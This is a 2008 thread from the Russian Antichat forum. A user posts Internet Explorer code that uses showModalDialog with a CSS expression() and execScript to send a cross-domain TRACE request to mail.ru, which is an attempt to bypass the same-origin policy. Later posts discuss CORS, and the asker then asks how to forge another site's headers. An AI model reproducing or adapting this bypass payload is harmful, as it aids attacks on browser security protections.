ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Обход ограничений безопасности Ajax
  #1  
Старый 31.07.2008, 11:04
Аватар для BestOFtheBest
BestOFtheBest
Новичок
Регистрация: 19.12.2007
Сообщений: 15
Провел на форуме:
114913

Репутация: 13
По умолчанию Обход ограничений безопасности Ajax

Подскажите пожалуста, каким образом можно отправить AJAX запрос на сторонний URL. Я нашел вариант для Internet Explorer:
Код:
<script>
function xssDomainRequest(){
var exampleCode = "var xmlHttp = new ActiveXObject('Microsoft.XMLHTTP');xmlHttp.open('TRACE','http://mail.ru',false);xmlHttp.send();xmlDoc=xmlHttp.responseText;alert(xmlDoc);";
cExampleCode = encodeURIComponent(exampleCode + ';top.close()');
var readyCode = 'font-size:expression(execScript(decodeURIComponent("' + cExampleCode + '")))';
showModalDialog('http://www.mail.ru',null,readyCode);}
</script>
Все вроде логично, но IE выдает ошибку, недопустимый аргумент, походу он не пропускает expression в showModalDialog. Что делать???
 
Ответить с цитированием

  #2  
Старый 31.07.2008, 11:38
Аватар для Don1=2
Don1=2
Участник форума
Регистрация: 10.09.2007
Сообщений: 131
Провел на форуме:
829460

Репутация: 170
По умолчанию

на сторонний сайт нельзя ajax.
 
Ответить с цитированием

  #3  
Старый 31.07.2008, 12:56
Аватар для BestOFtheBest
BestOFtheBest
Новичок
Регистрация: 19.12.2007
Сообщений: 15
Провел на форуме:
114913

Репутация: 13
По умолчанию

Не ужели еще ничего не придумали на эту тему??
 
Ответить с цитированием

  #4  
Старый 03.08.2008, 16:57
Аватар для [Raz0r]
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717

Репутация: 1980
Отправить сообщение для [Raz0r] с помощью ICQ
По умолчанию

Как раз на эту тему писал:
http://raz0r.name/articles/html-js-vzaimodejstvie-s-udalennym-serverom/
 
Ответить с цитированием

  #5  
Старый 11.08.2008, 17:02
Аватар для BestOFtheBest
BestOFtheBest
Новичок
Регистрация: 19.12.2007
Сообщений: 15
Провел на форуме:
114913

Репутация: 13
По умолчанию

Тоесть, как я понял, до выхода IE8 с поддержкой XDomainRequest выполнить запрос, типо trace, не получится, так?
 
Ответить с цитированием

  #6  
Старый 14.08.2008, 00:54
Аватар для [Raz0r]
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717

Репутация: 1980
Отправить сообщение для [Raz0r] с помощью ICQ
По умолчанию

почему же только IE, в FireFox 3 уже есть поддержка междоменных вызовов посредством AJAX
 
Ответить с цитированием

  #7  
Старый 14.08.2008, 10:59
Аватар для BestOFtheBest
BestOFtheBest
Новичок
Регистрация: 19.12.2007
Сообщений: 15
Провел на форуме:
114913

Репутация: 13
По умолчанию

Firefox3 - это гуд, я уже даже разобрался, че да как. А уязвимость в IE с showModalDialog походу прикрыли((
 
Ответить с цитированием

  #8  
Старый 14.08.2008, 12:23
Аватар для BestOFtheBest
BestOFtheBest
Новичок
Регистрация: 19.12.2007
Сообщений: 15
Провел на форуме:
114913

Репутация: 13
По умолчанию

Не, с ним тоже трабл, при попытке сделать запрос на другой домен, он его не грузит, а в консоли ошибок пишет, что ошибка системы безопасности, содержимое "мой адрес" не имеет права загружать данные с "запрашиваемый адрес".
 
Ответить с цитированием

  #9  
Старый 14.08.2008, 22:51
Аватар для [Raz0r]
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717

Репутация: 1980
Отправить сообщение для [Raz0r] с помощью ICQ
По умолчанию

ты точно разобрался? Скрипт, которому ты отправляешь запрос, должен возвращать специальный заголовок.
 
Ответить с цитированием

  #10  
Старый 10.09.2008, 16:55
Аватар для BestOFtheBest
BestOFtheBest
Новичок
Регистрация: 19.12.2007
Сообщений: 15
Провел на форуме:
114913

Репутация: 13
По умолчанию

Спасибо, все работает. Теперь думаю, каким бы образом фальсифицировать заголок стороннего сайта. Есть идеи на этот счет?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Сборник пыльной библиотеки \буржуйская\ xcedz Болталка 5 12.07.2008 18:12
Семь возможностей повышения безопасности сервера SharePoint Solide Snake Чужие Статьи 1 06.07.2008 02:53
Обход ограничений Fat32/ntfs (си) DaemoniZ С/С++, C#, Delphi, .NET, Asm 8 03.05.2008 19:47
Обход регистрации в Invision Power Board v1.3 Final DeeIP Форумы 1 10.04.2005 20:35



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ